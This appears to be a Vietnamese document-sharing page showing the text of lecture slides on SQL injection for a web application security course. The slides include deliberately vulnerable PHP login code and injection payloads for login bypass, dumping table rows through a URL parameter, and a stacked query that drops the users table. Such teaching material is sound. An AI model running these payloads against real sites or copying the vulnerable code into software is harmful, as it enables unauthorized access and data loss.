intTypePromotion=1
ADSENSE

Bài giảng Bảo mật ứng dụng Web: SQL injection - Nguyễn Hữu Thể

Chia sẻ: _ _ | Ngày: | Loại File: PDF | Số trang:63

15
lượt xem
0
download
 
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Bài giảng Bảo mật ứng dụng Web: SQL injection do Nguyễn Hữu Thể biên soạn nhằm cung cấp cho bạn kiến thức tổng quan về SQL injection như khái niệm, các dạng lỗi thường gặp, các dạng tấn công SQL injection. Mời các bạn tham khỏa!

Chủ đề:
Lưu

Nội dung Text: Bài giảng Bảo mật ứng dụng Web: SQL injection - Nguyễn Hữu Thể

 1. BẢO MẬT ỨNG DỤNG WEB SQL INJECTION Nguyễn Hữu Thể
 2. SQL Injection  Hình thức tấn công vào câu lệnh SQL.  attacker chèn câu lệnh vào SQL của chương trình • => khai thác dữ liệu.  Khai thác lỗi: các ứng dụng web với backend: • Không sử dụng data object • Dùng kết nối query thuần • Các thông báo lỗi của hệ quản trị cơ sở dữ liệu trả về 2
 3. SQL Injection ❖ Các dạng lỗi thường gặp:  Không kiểm tra ký tự thoát truy vấn  Xử lý không đúng kiểu  Lỗi bảo mật bên trong máy chủ cơ sở dữ liệu  Blind SQL Injection 3
 4. Các dạng tấn công SQL injection  Dạng tấn công vượt qua kiểm tra đăng nhập  Dạng tấn công sử dụng câu lệnh SELECT  Dạng tấn công sử dụng câu lệnh INSERT  Dạng tấn công sử dụng stored-procedures 4
 5. Dạng tấn công vượt qua kiểm tra đăng nhập (authorization bypass)  Đăng nhập nhờ vào lỗi khi dùng các câu lệnh SQL.  Ví dụ: table users như sau: CREATE TABLE users ( id INT NOT NULL AUTO_INCREMENT, username VARCHAR(100) NULL, password VARCHAR(50) NULL, PRIMARY KEY (id) ); INSERT INTO users (username, password) VALUES ('aaa', '123456'); INSERT INTO users (username, password) VALUES ('bbb', '123456'); 5
 6. Dạng tấn công vượt qua kiểm tra đăng nhập (authorization bypass) Username Password Câu truy vấn nhận dữ liệu: $sql = "SELECT * FROM users WHERE username = '".$_POST[‘username']."' AND password = '" . $_POST['password']. "'"; 6
 7. Dạng tấn công vượt qua kiểm tra đăng nhập (authorization bypass) require 'dbcon.php'; $sql = "SELECT * FROM users WHERE username = '".$_POST['username']."' AND password = '" . $_POST['password']. "'"; $result = mysqli_query($conn, $sql); $row = mysqli_fetch_array($result); if($row) echo "Thành công"; else echo "Thất bại"; mysqli_close($conn);
 8. Dạng tấn công vượt qua kiểm tra đăng nhập (authorization bypass) Đăng nhập: - Nhập vào ô username: khongbiet' OR 1 = 1 LIMIT 1 -- ] - Nhập vào ô password: khongbiet Kết quả truy vấn: SELECT * FROM users WHERE username = 'khongbiet' OR 1 = 1 LIMIT 1 -- ]' AND password = 'khongbiet' Tương đương: SELECT * FROM users WHERE username = 'khongbiet' OR 1 = 1 LIMIT 1 8
 9. Dạng tấn công vượt qua kiểm tra đăng nhập (authorization bypass) TH1: Nhập đúng username và password Đăng nhập thành công TH2: không biết username và password Đăng nhập thành công 9
 10. Dạng tấn công sử dụng câu lệnh SELECT  Lợi dụng các sơ hở trong các thông báo lỗi từ hệ thống • => Dò tìm các điểm yếu khởi đầu cho việc tấn công.  Thông thường: • Sẽ có một trang nhận ID của tin cần hiển thị • Sau đó truy vấn nội dung của tin có ID này • Hoặc ô nhập liệu tìm kiếm 10
 11. Dạng tấn công sử dụng câu lệnh SELECT  Ví dụ: CREATE TABLE monhoc ( maMon varchar(8) NOT NULL PRIMARY KEY, tenMon varchar(100) NOT NULL, soTC int(11) NOT NULL ); INSERT INTO monhoc (maMon, tenMon, soTC) VALUES ('03021003', 'Tin học cơ sở', 4), ('03021004', 'Nhập môn lập trình', 4), ('03021005', 'Phương pháp lập trình hướng đối tượng', 4); 11
 12. Dạng tấn công sử dụng câu lệnh SELECT Nhập tênmôn:
 13. Dạng tấn công sử dụng câu lệnh SELECT
 14. Dạng tấn công sử dụng câu lệnh SELECT Mã môn: 03021003. Tên môn: Tin học cơ sở 14
 15. Dạng tấn công sử dụng câu lệnh SELECT Mã môn: 03021004. Tên môn: Nhập môn lập trình Mã môn: 03021005. Tên môn: Phương pháp lập trình hướng đối tượng 15
 16. Dạng tấn công sử dụng câu lệnh SELECT Mã môn: 03021003. Tên môn: Tin học cơ sở Mã môn: 03021004. Tên môn: Nhập môn lập trình Mã môn: 03021005. Tên môn: Phương pháp lập trình hướng đối tượng SELECT * FROM monhoc WHERE tenMon = 'a' or 1=1-- ' 16
 17. Dạng tấn công sử dụng câu lệnh SELECT Câu lệnh Union: kết hợp 2 table cùng số cột SELECT * FROM users Union SELECT * From monhoc 17
 18. Dạng tấn công sử dụng câu lệnh SELECT http://localhost/MyPhamOnline/php/index.php?function=sanphamchitiet&id=1 Liệt kê 1 dữ liệu có trong table 18
 19. Dạng tấn công sử dụng câu lệnh SELECT http://localhost/MyPhamOnline/php/index2.php?function=sanphamchitiet&id=0 or 1=1 -- Liệt kê tất cả dữ liệu có trong table
 20. Dạng tấn công sử dụng câu lệnh SELECT Thực hiện nhiều truy vấn cùng lúc Giả sử câu truy vấn có dạng: $sql = "SELECT * FROM monhoc WHERE maMon = '" . $mamon . "'"; Người tấn công có thể nhập dữ liệu như sau: a'; DROP TABLE users; SELECT * FROM sinhvien WHERE '1' = '1 Câu truy vấn sau khi nhận dữ liệu như sau: SELECT * FROM monhoc WHERE maMon = 'a'; DROP TABLE users; SELECT * FROM sinhvien WHERE '1' = '1' 20
ADSENSE

CÓ THỂ BẠN MUỐN DOWNLOAD

 

Đồng bộ tài khoản
2=>2